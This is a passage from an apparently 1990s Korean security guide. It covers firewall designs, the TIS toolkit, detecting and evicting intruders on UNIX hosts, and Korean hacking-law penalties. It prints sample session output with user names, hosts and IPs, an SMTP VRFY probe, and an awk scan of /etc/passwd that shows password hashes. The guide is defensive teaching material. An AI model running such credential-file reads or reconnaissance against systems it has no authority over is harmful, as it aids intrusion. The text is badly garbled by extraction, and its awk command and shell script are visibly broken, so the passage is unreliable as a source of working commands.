워크와 내부네트워크를 의미하며 이중네트워크호스트는 외부네트워크와 내부네트워크간,
의 유일한 경로를 제공하는 기능을 갖도록 조정된다 따라서 동적인 경로배정과 경로정보.
전달을 배제하므로써 모든 내 외부 트래픽이 이 호스트를 통과하도록 하고 베스쳔호스트・의 기능을 여기에 구현하면 되는 것이다.
라 스크리닝호스트게이트웨이. (Screening Host Gateway)
스크리닝호스트게이트웨이 개념은 이 시스템을 내부네트워크에 두고 스크리닝라우터에 의
해 내부로 유입되는 모든 트래픽을 이 스크리닝호스트에만 전달되도록 하겠다는 것이다.
또한 스크리닝라우터는 내부에서 외부로 가는 모든 트래픽에 대해서도 스크리닝호스트에
서 출발한 트래픽만 허용하고 나머지는 거부하게 된다 그래서 내부와 외부 네트워크 사.
이의 경로는 외부네트워크 스크리닝라우터 스크리닝호스트 내부네트워크 이외의- - -
경로는 결코 허용하지 않게된다 이 스크린호스트도 결국 베스쳔호스트 이중네트워크호스. ,
트의 개념이 집합된 시스템이다.
마 스크린된 서브네트. (Screened Subnet)
스크린된 서브네트는 일명 를 외부네트워크와 내부네트워크DMZ(DeMiliterization Zone)
사이에 둔다는 개념으로서 완충지역 개념의 서브네트를 운영하는 것이다 여기에 스크리.
닝 라우터를 이용하여 이 완충지역을 곧장 통과 못하게 하지만 외부네트워크와 내부네트
워크에서 모두 이 스크린된 서브네트에 접근할 수는 있다 특히 어떤 기관에서 외부로 공.
개할 정보 서퍼 즉 일명 서버 고퍼 서버 월드와이트웹(Information Server), FTP , (Gopher) ,
서버 등을 여기에서 운영하면 된다(WWW) .
바 응용서비스 계층게이트웨이. (Application Level Gateway)
응용서비스계층의 서비스들은 저장 및 전달 방법을 쓰는 경우가 많(Store-and-Forward)
은데 이는 게이트웨이에서 수행할 방법과 그대로 맞아떨어지게 된다 게이트웨이는 송신, .
자 응용서비스가 보내는 각종 정보를 그대로 전달하면 된다 실제로 이 게이트웨이에서는.
정보보호을 위한 특별한 서비스가 제공된다 예를 들어 내부와 외부간의 모든 응용서비스.
수준의 트래픽에대해 로그기록이나 나 등에서 사용자 인증을 할 겨우 보다, Telnet FTP
우수한 방법을 사용한 변경된 인증방법을 이용한다든가 할 수 있다 이 응용서비스계층의.
게이트웨이 기능은 프록시서버라는 인터네트상의 클라이언트 서버 개념의 서버 기능을 제/
공하게 된다 예를 들어 외부의 전자우편 클라이언트가 내부의 어떤 호스트의 전자우편.
서버와 접속을 맺기를 원한다면 중간의 프록시서버가 이를 접수하여 다시 내부의 서버에
게 전달하는 방식이 된다.
사 방화벽시스템의 사용자인증 시스템.
방화벽시스템은 한 기관의 네트워크 전체를 보호해야하므로 일반적으로 유닉스시스템에서
사용되는 단순한 패스워드 기법으로 사용자를 인증하는 방법을 사용하지는 않는다 보다.
우수한 인증시스템으로서 일회용패스워드 를 보통 채택하고 있다 즉(One Time Passwd) .
매번 사용자가 로그인을 시도할 때마다 매번 새로운 패스워드를 이용하는 것인데 이는,
침입자들이 최근 이용하고 있는 에 의한 패킷가로채기를 통해 시스템의 사용자 와sniffer ID
패스워드를 알아내서 침입하는 것을 막아주게 된다 일회용패스워드시스템의 구현에.
개념을 사용하는데 다음과 같은 절차를 따른다challenge-Response , .
사용자는 자신이 로그인하려는 시스템으로부터 로서 난수1) Challenge (Random Number)
를 받는다.
사용자는 자신이 가지고 있는 마치 계산기처럼 작은2) HHA(Hand Held Authenticator)
로 와 자신의 를 입력한다Challenge ID .
는 시스템이 가지고 있는 동일한 알고리즘으로 일회용패스워드를 알려준다3) HHA .
사용자는 가 지시하는 일회용패스워드를 사용 하여 시스템에 무사히 로4) HHA (Response)
그인한다.
이것은 시스템과 가 동일한 일회용패스워드를 생성하는 알고리즘을 공유하고 있으HHA
며 매번 생성된 난수와 사용자 에 의해 동일한 패스워드를 생성할 수 있다는 것을 의, ID
미한다.
아 암호장비. (Encryption Devices)
암호장비는 어떤 기관의 네트워크가 공공의 인터네트를 통해 여러 지역으로 분산되어 있
을 경우 적당하다 즉 어떤 본사 네트워크가 방화벽 시스템을 구축하였을 때 지역적으로.
떨어진 지점 네트워크도 본사 네트워크처럼 보호되어야하는 것이다 이 경우 본사와 지점.
네트워크 간이 인터네트로 연결되었다면 안전을 보장하기 어려우므로 두 지점사이를 암호
장비를 이용하여 가상사설링크 로 만들어 운영하면 된다 이렇(VPL, Virtual Private Link) .
게 하므로써 두개의 네트워크를 논리적으로 하나의 안전한 네트워크로 만드는 것이다.
방화벽시스템의 구현4.
가 예제로 보는 방화벽 시스템 구성.
다음 그림 은 예제로 구성한 방화벽시스템을 보여주고 있다 외부인터네트와는 스< 4-5> .
크리닝라우터로 연결하며 외부인터네트와의 연결점에는 스크린된 서브네트가 구성되어 하
나의 완충지대를 만들며 여기에 외부에 공개하는 서버 서버를 운영할 수 있FTP , WWW
다 그리고 내부로 들어가는 모든 트래픽은 베스쳔호스트를 거쳐야 하며 베스쳔호스트에.
서는 허용된 네트워크 응용별로 가상서버를 운영하고 있다.
그림 방화벽시스템 구축 예제< 4-5>
나 방화벽 툴킷을 이용한 방화벽 구축. TIS
사에서 제작하여 배포하고 있는 툴킷은 소스가 공개된TIS(Trusted Information System)
방화벽시스템이다 이 툴킷은 위에서와 같은 방화벽시스템에서 거론된 거의 모든 개념을.
지원하며 소스를 볼 수 있으므로 일반적인 제품들이 제공하는 방법보다 유연하다 이 툴, .
킷의 특징은,
응용서비스계층 게이트웨이 프록시서버 지원1) ( )
로그기능 지원2)
일회용패스워드 등 사용자 인증 기능 제공3)
공개소프트웨어 확장 가능4) /
정책구현의 용이5)
설치 및 호환성 유지6)
최소한의 기본 구현7)
으로서 대부분의 다른 제품의 기본이 되는 기능들을 가지고 있다.
이 패키지는
ftp://ftp.tis.com/pub/toolkit/fwtk-v1.3.tar.Z
에서 익명 를 이용하여 가져와서 설치하면 된다 지원되는 운영체제는(Anonymous) FTP .
등으로서 베스쳔호스트로 구성하여 운영하면 된다SunOS, Solaris, Linux, BSDI .
이 툴키트의 구성요소는 다음과 같다.
프록시 서버1) tn-gw : Telnet
프록시 서버2) rlogin-gw : Rlogin
프록시 서버3) ftp-gw : FTP
랩퍼4) netacl : TCP (Wrapper)
프록시 서버5) http-gw : WWW
범용 프록시 서버6) plug-gw : TCP
전자우편 랩퍼7) smap/smapd :
인증서버8) authserv :
툴키트의 설치 순서는 다음과 같다.
소스패키지를 가져온다1) .
자신의 환경에 맞게 컴파일 하여 설치한다2) OS .
를 고쳐 가상서버를 구동하도록 한다3) /etc/inetd.conf .
에 환경에 따라 정의한다4) /usr/local/etc/netperm-table .
나 의 내용을 수정한다5) /etc/rc /etc/rc.local .
불필요한 커널의 네트워크서비스를 없애고 커널을 재구성한다6) .
사의 방화벽툴키트와 같은 공개 제품들을 우선 설치하여 사용하므로써 간단한 이용TIS
과 함께 개념과 방법론을 익힌 후 상용 제품을 구매하거나 외부 업체의 자문을 받던가, ,
하는 접근 방법을 취하는 것이 바람직하다 이렇게 하므로써 실제의 비용을 치르기 전에.
기관전체의 네트워크상의 문제점을 미리 파악하는데도 도움이 될 것이다.
방화벽시스템 제품의 종류를 알고 싶다면 다음 로 접근해 보면 전세계적인, WWW URL
목록을 볼 수 있다.
http://www.access.digex.net/~bdboyle/firewall.vendor.html
또한 몇개의 제품들은 국내에서도 판매 지원하고 있는데 모두 열거할 수는 없지만 다음,・에 그 일부를 열거한다.
유앤아이시스템즈 주1) ( )/02-782-4900
방화벽제품LOCKout, ANS InterLock
동부산업 주2) ( )/02-262-1400
방화벽제품OpenV*Secure,OpenV*Gatekeeper
데이터게이트인터내셔날 주3) ( )/02-786-4281
네트워크 정보보호관리 제품OmniGuard
한국컴퓨터어쏘시에이트 주4) ( )/02-528-4124
종합 정보보호 관리 도구 제품UniCenter
한국썬 주5) ( )/02-02-563-8700
방화벽시스템Firewall-1
기타6)
한국 주 등IBM( )
제 절 침입자의 발견과 처리 지침4
침입자의 발견과 추적1.
현재 침입을 당하고 있는 것을 알았을 때 혹은 침입의 흔적을 발견했을 때 어떻게 해야, ,
할지 일반적으로 시스템 관리자는 당황하게 된다 이와 같은 경우에 대비한 절차를 정책.
으로 미리 세워둘 필요가 있다 먼저 다음을 염두에 두고 사태에 대처하는 것이 중요하다. .
침입자를 포착하여 잡을 것인가?○
시스템의 손상을 어떻게 복구 할 것인지?○
그리고 주의해야 할 점으로서
당황하지 말아야 한다.○
정말 침해당한 것인지 의심해보아야 하는데 시스템관리자나 프로그래머의 실수일 가,○
능성이 있기 때문이다.
실제 화일은 손상을 입었나 대부분의 침입시 그렇지 않은 경우가 많다 증거물을? - .○
획득하고 보관할 필요성이 있는지 결정한다.
가능한 빨리 복구하여 정상화해야 할 필요가 있는지 결정한다.○
화일의 변경유무를 다시 확인할 필요성이 있는지 판단하다.○
내부나 외부 사람이 이 사실을 알아도 되는지 판단한다.○
다시 발생가능한 일인지 판단한다.○
문서화 작업을 시행한다.○
즉시 를 만들어야 하는데 연필로써도 좋고 하드카피나 명령을 이용할 수log , , , script(1)○
도 있다.
침입자를 발견할 수 있는 형태는 다음과 같은 여러가지가 있을 수 있다.
관리자가 침입자의 활동을 직접 감시○
등의 시스템화일이 변경된 것을 확인security hole, /etc/passwd○
다른 지역의 관리자로부터의 통지○
관리자가 이를 알기 위해서는 시스템의 비정상적인 활동이나 현상을 파악하는 것인데 예, ,
를 들어 다음과 같은 것들이다.
한 사용자가 두 번 이상 로그인하고 있다○
일반 사용자가 컴파일러 디버거 등을 사용한다,○
네트워크에 로드를 걸고 이상한 프로그램을 실행한다○
한 사용자가 많은 외부 접속을 시도하고 있다○
일반 모뎀 사용자가 아닌데 모뎀으로 로그인하고 있다○
관리자가 아닌데 관리자로서 특별한 명령어를 사용한다○
휴가중이거나 근무시간이 아닌데 사용한다,○
침입자를 발견한 후 관리자의 초치는 상황을 보며 판단하는 것이 좋은데 다음은 일반적,
으로 취할 수 있는 방법들을 열거한 것이다.
무시한다○
이것은 관리자가 정보보호에 대해 아무 생각도 방향도 없는 경우이다.
대화한다○
등으로 적절하게 추적할 시간을 벌며 침입자의 의도를 파악하려는 방법이talk(1),write(1)
다 침입자들은 관리자의 대화 요구에 대해 대부분 도망치지만 일부 뻔뻔하거나 자신있는.
침입자들은 대화에 응하고 요구사항이 무엇인지 이야기하기도 한다 사실 다음 항의 역추.
적을 통해 침입자의 컴퓨터가 어디인지 알아낸 후 대화를 시도하는 것이 바람직하다.
접속을 추적한다.○
침입자를 실제 잡으려는 시도인데 네트워크로 접속한 경우에는 대화하며 역추적할 충분,
한 시간을 벌어야 한다 물리적 단말기일 경우 즉시 단말실에서 확인한다 그리고 역추적. .
하면서 침입자의 컴퓨터에 을 보내거나 를 시도하지 않는다 이유는 그쪽mail(1) talk(1) .
의 컴퓨터가 이미 해킹을 당했는지도 모르기 때문이며 이럴 경우 별 소득을 올리지 못하,
게 될 뿐 아니라 침입자가 눈치채게 되는 것이다 전화를 이용하여 상대편 관리자와 직접.
통화하는 것이 좋은 방법이다.
접속을 끊는다○
프로세스를 중단시키거나 네트워크 연결을 끊거나 전원을 중단한다 이 경우 관리자의, , .
선택은 둘 중의 하나이다 그 침입자가 다시 침입하더라도 막아낼 자신이 있거나 혹은 침.
입자가 이용한 불법 침입 방법을 봉쇄하였거나 그 침입자의 신원을 밝힌 경우와 그렇지,
못했다 하더라도 침입자를 빨리 몰아내고 침입자의 불법 행위를 처리한 다음 빨리 정상적
인 서비스를 해야 하는 경우이다.
여기에서 네트워크를 통해 들어온 침입자를 추적하려 한다면 우선 그 침입자가 사용하는,
터미널을 파악하기 위해 등을 이용한다 만약 물리적인 터w(1), ps(1), who(1), finger(1) .
미널이라면 등으로 표시되며 네트워크를 경유한 가상단/dev/tty01, tty01, 01, ttya, tty4a ,
말기는 등이 포함된 등으로 나타난다p, q, r ttyp1 .
다음은 의 예제를 보여 주고 있다w(1), ps(1), finger(1), who(1) .
garam%
오후5:09 가동중 일20 ,
사용자 터미널 로그인@ 휴지 JCPU PCPU 활동
yhlee pts/0 일오후10 18:06
/usr/local/bin/hvi /tmp/snd.1704
yhlee pts/3 일오후11 17:36 telnet garam
yhlee pts/4 오후11:12 16:41 -csh
ohbyeon pts/5 오후5:00 8 2 -csh
jwkim pts/6 오후1:36 33 12 3 elm
daegoo pts/7 오후5:07 ftp biho.taegu.ac.kr
jwkim pts/8 오후3:22 1:17 telnet gaya
chlim pts/9 오후5:08
ybyoo pts/10 오전9:15 1:59 w
garam% ps -ef -csh
UID PID PPID C STIME TTY TIME COMD
root 0 0 74 월8 01 ? 0:01 sched
root 1 0 80 월8 01 ? 8:19 /etc/init -r
root 2 0 80 월8 01 ? 0:01 pageout
root 157 1 46 월8 01 ? 0:00 /usr/lib/nfs/lockd
root 176 1 11 월8 01 ? 0:00 /usr/lib/autofs/automountd
root 207 200 26 월8 01 ? 0:00 lpNet
root 180 1 80 월8 01 ? 3:07 /usr/sbin/syslogd
root 200 1 80 월8 01 ? 0:06 /usr/lib/lpsched
root 190 1 80 월8 01 ? 0:07 /usr/sbin/cron
root 223 1 13 월8 01 ? 0:00 /usr/xtl/bin/xtl_server
root 209 1 80 월8 01 ? 3:37 /usr/lib/sendmail -bd -q1h
root 1083 152 34 월8 01 ? 0:00 in.ftpd
chlim 22654 22652 62 17:08:45 pts/9 0:01 -csh
root 22381 209 5 16:46:07 ? 0:00 /usr/lib/sendmail -bd -q1h
yhlee 17067 17065 62 23:07:50 pts/3 0:01 -csh
root 22321 22320 6 16:37:56 ? 0:00 /usr/lib/sendmail -bd -q1h
chlim 22701 22700 19 17:09:45 pts/11 0:00 sh -i
? 29867 152 14 월8 14 ? 0:00 rpc.rstatd
ybyoo 18268 18266 57 09:15:44 pts/10 0:01 -csh
chlim 10063 1 31 월8 11 ? 0:00 elm -f kis-book
root 3417 152 29 월8 11 ? 0:00 in.ftpd
root 22652 152 25 17:08:45 ? 0:00 in.telnetd
root 22547 152 26 17:00:44 ? 0:00 in.telnetd
root 22440 22130 10 0:00 <defunct>
jwkim 21697 20623 80 15:21:16 pts/6 0:04 elm
root 22672 152 10 17:08:55 ? 0:00 in.comsat
root 22620 152 34 17:07:13 ? 0:00 in.telnetd
root 1766 152 54 월8 01 ? 0:01 rpc.ttdbserverd
root 29357 152 80 월8 14 ? 3046:09 /usr/sbin/inetd -s
chlim 22711 22701 21 17:09:56 pts/11 0:00 ps -ef
root 18266 152 28 09:15:44 ? 0:00 in.telnetd
root 22438 22130 15 0:00 <defunct>
root 22130 209 80 16:17:26 ? 0:06 /usr/lib/sendmail -bd -q1h
root 17098 152 66 23:11:47 ? 0:01 in.telnetd
root 18515 152 80 월8 17 ? 2200:52 /usr/sbin/inetd -s
root 22382 22381 9 16:46:08 ? 0:00 /usr/lib/sendmail -bd -q1h
ohbyeon 22549 22547 63 17:00:44 pts/5 0:01 -csh
yhlee 1797 17067 23:11:47 pts/3 0:01 telnet garam
sylim 21322 1 14:59:01 ? 0:02 elm
root 22320 209 16:37:51 ? 0:00 /usr/lib/sendmail -bd -q1h
yhlee 7045 17044 22:45:14 pts/0 0:00 /usr/local/bin/hvi /tmp/snd.17040
yhlee 17040 17027 22:43:15 pts/0 0:00 elm
chlim 22700 22699 17:09:45 pts/9 0:00 script
garam% finger
Login Name TTY Idle When Where
yhlee Lee youngho* pts/0 18 Sun 22:42 134.75.23.10
yhlee Lee youngho* pts/3 17 Sun 23:08 134.75.23.10
yhlee Lee youngho* pts/4 16 Sun 23:12 garam.kreonet.re.kr
ohbyeon Byeon OckHwan(Chief) pts/5 8 Mon 17:00 nic.kreonet.re.kr
jwkim Kim jaewoo(staff) pts/6 33 Mon 13:36 nic.kreonet.re.kr
daegoo Kim hyunsop- pts/7 Mon 17:07 203.244.128.51
jwkim Kim jaewoo(Staff) pts/8 1:17 Mon 15:22 nic.kreonet.re.kr
chlim Chaeho Lim(staff) pts/9 Mon 17:08 cheif.kreonet.re.kr
ybyoo YearBack Yoo pts/10 1:59 Mon 09:15 xterm9.kreonet.re.kr
garam% who
yhlee pts/0 월8 20 22:42 (134.75.23.10)
yhlee pts/3 월8 20 23:08 (134.75.23.10)
yhlee pts/4 월8 20 23:12 (garam.kreonet.re.kr)
ohbyeon pts/5 월8 21 17:00 (nic.kreonet.re.kr)
jwkim pts/6 월8 21 13:36 (nic.kreonet.re.kr)
daegoo pts/7 월8 21 17:07 (203.244.128.51)
jwkim pts/8 월8 21 15:22 (nic.kreonet.re.kr)
chlim pts/9 월8 21 17:08 (cheif.kreonet.re.kr)
ybyoo pts/10 월8 21 09:15 (xterm9.kreonet.re.kr)
garam%
그림< 4-6> 예제w, ps, finger, who
다음은 명령의 사례를 보여주고 있는데 명의 사용자가 네트워크로 접속해 들어who(1) , 2
온 것을 알 수 있으며 은 에서 들어온 것을 알 수 있지만 은, jason robot.ocp.com , devon
가 호스트의 이름을 자리 밖에 보여주지 않아 전체 호스트 도메인이름을 알 수가who 16
없는 상태이다 이럴 경우 을 이용하여 네트워크 접속된 상황을 감시한다. netstat(1) .
% who
orpheus console jul 16 16:01
root tty01 jul 15 20:25
jason ttyp1 jul 16 15:18 (robot.ocp.com)
devon ttyp2 jul 16 14:25 (next.cambridge.m)
%
다음은 이라는 사용자가 의심스러워서 를 이용하여 상대편의 정보를 알아내는jason finger
과정을 보여주고 있다 여기에서는 당연히 가 침입자임을 보여주고 있다 왜냐하면. wonder .
는 콘솔 을 사용하는 시스템 관리자일 것이며 현재 하기 때문이다olivia (Console) , idle .
[robot.ocp.com]
login name TTY ldle When Office
olivia Dr. Olivia Lason co 12d Sun 11:59
wonder Wonder Hacker p1 Sun 14:33
%
에서 옵션은 상대편 시스템에 관한 더욱 많은 정보를 보여 줄 것이다 만약finger(1) “-l” .
이 시스템에서도 중간 경우지로 사용되어 계속 추적할 필요가 있을 경우에는
으로 를 이용 관리자의 정보를 알아 전화하고 대화하여 협조를[email protected] finger(1) ,
구하도록 한다.
다음은 접속을 통해 정보를 획득하는 사례를 보여주고 있으며SMTP POSTMASTER
혹은 도메인 이름을 찾아 등록된 관리자의 이름과 정보를 알NIC.DDN.MIL( rs.internic.net)
수도 있다.
garam% telnet garam.kreonet.re.kr smtp Trying 134.75.30.11 ...
Connected to garam.kreonet.re.kr.
Escape character is '^]'.
220-garam.kreonet.re.kr Sendmail 8.6.9H1/8.6.9 ready at Mon, 21 Aug 1995
17:42:35 +0900
220 ESMTP spoken here
helo
250 garam.kreonet.re.kr Hello garam.kreonet.re.kr [134.75.30.11], pleased
to meet you
vrfy postmaster
250 KREONet Administrator <[email protected]>
quit
221 garam.kreonet.re.kr closing connection
Connection closed by foreign host.
garam%
garam%
그림 접속 사례< 4-7> SMTP
침입자의 분석과 몰아내기2.
충분한 대비를 한 다음에 침입자를 몰아내야 하는데 가장 간단한 방법은 전원을 끄거나 아,
니면 그 침입자의 패스워드를 바꾸고 침입자의 프로세스를 죽인다 만약 관리자에게 들킨.
것을 침입자가 먼저 알아낸다면 관리자나 시스템에 큰 손상을 먼저 가할 수도 있는 것이다.
이를 위해서는 의 로그파일을 분석해야하는데 주로UNIX ,
비정상적인 시간대의 과login ,○
이 많은 경우failed Login ,○
의심스러운 명령su ,○
낯설은 시스템으로부터의 login○
등을 체크한다 하지만 교묘한 침입자는 대부분 이러한 시스템 로그파일이나 자신의 사용. ,
흔적을 지워 보통의 정상상태로 만들어 두는 예가 많다 이것이 어려울 경우 아예 로그파일.
전체를 없애버리기도 한다.
침입자를 몰아내고 여러 분석을 마친 후 침입자가 만들어둔 여러 가지 불법작업들을 정리해
야 하는데 특히 침입자가 주로 하는 일은, ,
새로운 계정의 생성○
현재 계정의 패스워드 교체○
어떤 파일의 접근 모드 를 교체(protection mode)○
프로그램을 작성SUID, SGID○
시스템 프로그램을 교체 또는 수정○
특정 프로그램을 실행하기 위해 에 를 생성mail alias○
나 등에 새로운 기능을 삽입News UUCP○
하는 등으로서 먼저 새로운 계정을 만든 경우에는 파일을 원래대로 복구해야, /etc/passwd
한다 특히 가 인 경우 패스워드가 없는 경우 등을 검사한다 다음 명령은. UID 0 , .
파일에서 패스워드가 없거나 권리자 권한을 줄 수 있는 개 필드가 안 되는 엔/etc/passwd 7
트리를 찾는 명령이다awk(1) .
#awk -F: 'NF != 7 $3 0 $2 = " " { print $1 " " $2 " " $3}'∥ = ∥ ₩
</ect/passwd
root xq7xmot9T 0
jason f5eyT7eX 0
#
그리고 침입자들이 만들어 둔 불법 바이러스 프로그램 등을 없애기 위해 프로SUID, SGID
그램 등을 색출하고 파일과 디렉토리 등의 권한 모드의 변경 유무 점검 과 비교하, backup
여 무결성 점검 등을 시도한다 특히 다음과 같은 시스템 파일에 대한 조작이 있(Integrity) .
는지 필히 검사한다.
/.rhosts, /etc/hosts.equiv○
파일은 네트워크를 통해 패스워드를 묻지 않고 원격지 로그인을 할 수 있는 컴퓨터.rhost
들을 등록하는 파일이므로 가능한 없어야 하지만 혹 운용한다면 변경된 내용이 없는지 비교
한다 파일에는 더 등록된 호스트가 없는지 점검하고 등을 운영할. /etc/hosts.equiv NIS, NFS
경우에는 와 등을 검사한다/etc/netgroups /etc/exports .
시작 파일○
사용자들의 디렉토리에 설치되 사용되는 로 시작하는 파일 이름들이 변경HOME “.(dot)”
되지 않았는지 등으로 만들어 두었다가 비교하도록 사용자에login.old, cshrc.old, profile.old
게 미리 알려 주고 의 이러한 파일과 을 잘 검사한다 전자우편 을root /etc/profile . (sendmail)
사용한다면 파일을 잘 체크해주어야 한다 다음 쉘스크립트 는 간단하.forward . (shell script)
게 이러한 파일들의 변경 유무를 체크한다.
#!/bin/sh
# Find for .files in home directories
자for i in 'a -F: '{print $6}' </etc/passwd'
do
echo $i/.[a-zA-Z]*>> /tmp/dots$$
done
/bin/ls -ltc 'cat /tmp/dots$$'
/bin/rm -f /tmp/dots$$
숨겨진 파일 디렉토리 찾기,○
숨겨진 디렉토리는 훔친 정보를 저장하거나 불법 프로그램을 저장하는데 이용된다 침입자.
는 보통 어떤 의 디렉토리를 지우고 다른 새로운 디렉토리를 만드는 등의subdirectory “..”
수법을 사용하는데 나 를 이용하여 찾는다 최근에는 등, find , /etc/fsck . “.. ”(doc, cot, space)
의 디렉토리 이름과 같이 특수문자나 제어문자 등을 이용하기도 한다 예를 들어. ,
% ls -l
drwxr-xr-x 1 jason 1024 Jul 29 10:34 fools
% cd fools
fools: No such file or directory
%
예제는 디렉토리는 다음에 공백이 하나 더 있음을 말한다 이런 경우에는 다음fools fools .
과 같이,
% ls -l
drwxr-xr-x 1 jason 1024 Jul 29 10:34 fools
% cd *ol*
%
와일드 문자를 사용하면 된다 또한 제어문자가 여러 개 동시에 쓰인 경우에는.
% ls -l
-rw-rw-r-- 1 jason 1024 Jul 10 9:34 bog?file
% echo * | cat -v
bos^Yfile
%
와 같이 를 이용하면 된다cat -v .
라 소유주가 없는 파일.
침입자가 새로운 계정을 만들고 사용하다가 떠나며 계정을 지웠지만 해당하는 파일을 남겨
두는 경우가 있다 이 경우 나 에 정의되지 않은 나 를 갖. , /etc/passwd /etc/groups UID GID
는 파일이 있다는 것의 의미하므로,
# find / -nouser -o nogroup -print
로 찾는다.
제 장 해킹관련 국내 법률 현황5
제 절 공공기관의 개인정보보호에 관한 법률1
공공기관의 개인정보보호에 관한 법률은 공공기관의 컴퓨터에 의하여 처리하는 개인정보의
보호를 위하여 그 취급에 관하여 필요한 사항을 정함으로써 공공업무의 적정한 수행을 도모
함과 아울러 국민의 권리와 이익을 보호함을 목적으로 년 월 일 법률 제 호 제정1993 1 7 4734
되어 년 월 일부터 시행되었다 표 참조1995 1 7 (< 5-1> .)
표 공공기관의 개인정보보호에 관한 법률 중 벌칙 조문< 5-1>
처벌 조항 처벌 내용제 조 벌칙23 공공기관의 개인정보처리업무를 방해할 목적으로 공공기관에서 처리하①
고 있는 개인정보를 변경 또는 말소한 자는 년 이하의 징역에 처한10다.제 조의 규정을 위반하여 개인정보를 누설 또는 권한 없이 처리하거22②나 타인의 이용에 제공하는 등 부당한 목적으로 사용한 자는 년 이3하의 징역 또는 천만원 이하의 벌금에 처한다1 .허위 기타 부정한 방법으로 공공기관으로부터 처리정보를 열람 또는③제공받는 자는 년 이하의 징역 또는 만원 이하의 징역에 처한2 700다.
제 절 공업 및 에너지 기술기반조성에 관한 법률2
공업 및 에너지 기술기반조성에 관한 법률은 공업 광업 및 에너지 산업의 발전을 위한 기・술기반을 조성하고 공업 광업 및 에너지 산업의 경쟁력 강화에 기여하는 사업의 지원을 위・하여 필요한 사항을 규정함으로써 국민경제의 발전에 이바지함을 목적으로 년 월1994 12 22
일 법률로 제 호로 제정되었다 표 참조4824 (< 5-2> .)
표 공업 및 에너지 기술기반조성에 관한 법률 중 벌칙 조문< 5-2 >
처벌 조항 처벌 내용제 조 벌칙22 제 조 제 항의 규정 산업정보의 안전관리 등 에 위반하여 전담사업자8 4 ( )①
의 컴퓨터 파일에 기록된 전자문서 또는 데이터베이스에 입력된 산업정보 기록을 위조 변조하거나 위조 변조된 전자문서 또는 산업정보・ ・기록을 행사한 자는 년 이하의 징역 또는 억원 이하의 벌금에 처10 1한다.다음 각 호의 에 해당하는 자는1② 년 이하의 징역5 또는 천만원 이5하의 벌금에 처한다.제 조 제 항의 규정 산업정보의 안전관리 등 에 위반하여 전담사업1. 8 5 ( ) 자의 컴퓨터 파일에 기록된 전자문서 또는 데이터베이스에 입력된산업정보기록을 훼손하거나 그 산업정보의 비 을 침해한 자.제 조 제 항의 규정 산업정보의 안전관리 등 에 위반하여 그 업무상2. 8 6 ( ) 알게된 산업정보에 관한 비 을 누설하거나 이를 도용한 전담사업자의 임원 직원이거나 임원 직원이었던 자.・ ・
제 절 무역업무 자동화촉진에 관한 법률3
무역업무 자동화촉진에 관한 법률은 무역업무의 자동화를 촉진하여 무역절차의 간소화와 무
역정보의 신속한 유통을 실현하고 무역업무의 처리시간과 비용을 절감하여 산업의 국제경쟁
력을 높임으로써 국민경쟁의 발전에 이바지함을 목적으로 년 월 일에 제정되었다1991 12 31
표 참조(< 5-3> .)
표 무역업무 자동화촉진에 관한 법률 중 벌칙 조문< 5-3>
처벌 조항 처벌 내용제 조 벌칙25
제 조 벌칙26 제 조 과태료28
제 조 제 항의 규정 전자문서 및 무역정보에 관한 정보 에 위반하여18 1 ( )①지정사업자 무역업자 무역유관기관 및 대행처리 사업자의 컴퓨터파일, ,에 기록된 전자문서 또는 데이터베이스에 입력된 무역정보를 위조 또는 변조하거나 이를 행사한자는 년 이상 년 이하의 징역 또는1 10 1억원 이하의 벌금에 처한다.
다음 각 호의 에 해당하는 자는1 년 이하의 징역 또는 천만원 이하의5 5벌금에 처한다.
제 조 제 항의 규정 전자문서 및 무역정보에 관한 정보 에 위반하3. 18 2 ( )여 지정사업자 무역업자 무역유관기관 및 대행처리업자의 컴퓨터, ,파일에 기록된 전자문서 또는 데이터베이스에 입력된 무역정보를훼손하거나 그 비 을 침해한 자.제 조 제 항의 규정 전자문서 및 무역정보에 관한 정보 에 위반하4. 28 3 ( )여 업무상 지득한 전자문서상의 비 과 무역정보에 고나한 비 을누설하거나 도용한 지정 사업자의 임원 또는 직원이거나 임원 또는직원이었던 자.제 조 제 항의 규정 전자문서 및 무역정보에 관한 정보 에 위반하5. 18 3 ( )여 업무상 지득한 전자문서상의 비 과 무역정보에 관한 비 을 누설하거나 도용한 지정사업자의 임원 또는 직원이거나 임원 또는 직원이었던 자.
다음 각 호의 에 해당하는 지정사업자는1① 억원 이하의 과태료에 처1한다.제 조 제 항의 규정 전자문서 및 무역정보에 관한 정보 에 의한 보1. 18 5 ( )호 조치를 시행하지 아니하거나 상공자원부장관의 승인을 얻지 아니하고 보호조치를 시행한 지정사업자.제 조 제 항 및 제 항의 규정에 위반하여 전자문서 및 무역 정보2. 19 1 2를 공개한 지정사업자.
제 절 신용정보의 이용 및 보호에 관한 법률4
신용정보의 이용 및 보호에 관한 법률은 신용정보망을 구축하고 정보의 효율적인 이용과 체
계적인 관리를 위한 측면과 함께 정보사회에서의 사생활 비 정보로서 보다 엄격하게 취급
되어야 할 신용정보에 대한 요용과 남용을 방지하여 사생활의 비 등 국민의 기본권을 보
호하고 신용질서를 확립하기 위한 목적으로 년 월 일 법률 제 호로 제정되었다1995 1 5 4866
표 참조(< 5-4> .)
표 신용정보의 이용 및 보호에 관한 법률 중 벌칙 조문< 5-4>
처벌 조항 처벌 내용제 조 벌칙31
제 조 과태료35
다음 각 호의 에 해당하는 자는1 년 이하의 징역 또는 천만원 이하3 3의 벌금에 처한다.
권한 없이 신용정보전산시스템 공동전산망을 포함한다 의 정보를 변11. ( )경 삭제 기타 이용 불능하게 하거나 권한 없이 신용정보를 검색・ ・복제 기타의 방법으로 이용한 자.
다음 각 호의 에 해당하는 자는1① 만원 이하의 과태료에 처한다300 .제 조의 규정 신용정보 전산시스템의 안전보호 을 위반한 자 신3. 19 ( ) (*용 정보 전산시스템의 보안대책 미수립 법 제 조( 19 )
제 절 전기통신 기본법5
전기통신 기본법은 전기통신에 관한 기본적인 사항을 정하여 전기통신을 효율적으로 관리하
고 그 발전을 촉진함으로써 공공복리의 증진에 이바지함을 목적으로 년 월 일 법률1991 8 10
제 호로 제정되었다 표 참조4393 (< 5-5> .)
표 전기통신 기본법 중 벌칙 조문< 5-5>
처벌 조항 처벌 내용제 조 벌칙47 공익을 해할 목적으로 전기통신설비에 의하여 공연히 허위의 통신을①
한 자는 년 이하의 징역 또는 천만원이하의 벌금에 처한다5 2 공공(허위통신)자기 또는 타인에게 이익을 주거나 타인에게 손해를 가할 목적으로②전기통신설비에 의하여 공연히 허위의 통신을 한 자는 년 이하의3징역 또는 천만원이하의 벌금에 처한다1 .
제 절 전기통신 사업법6
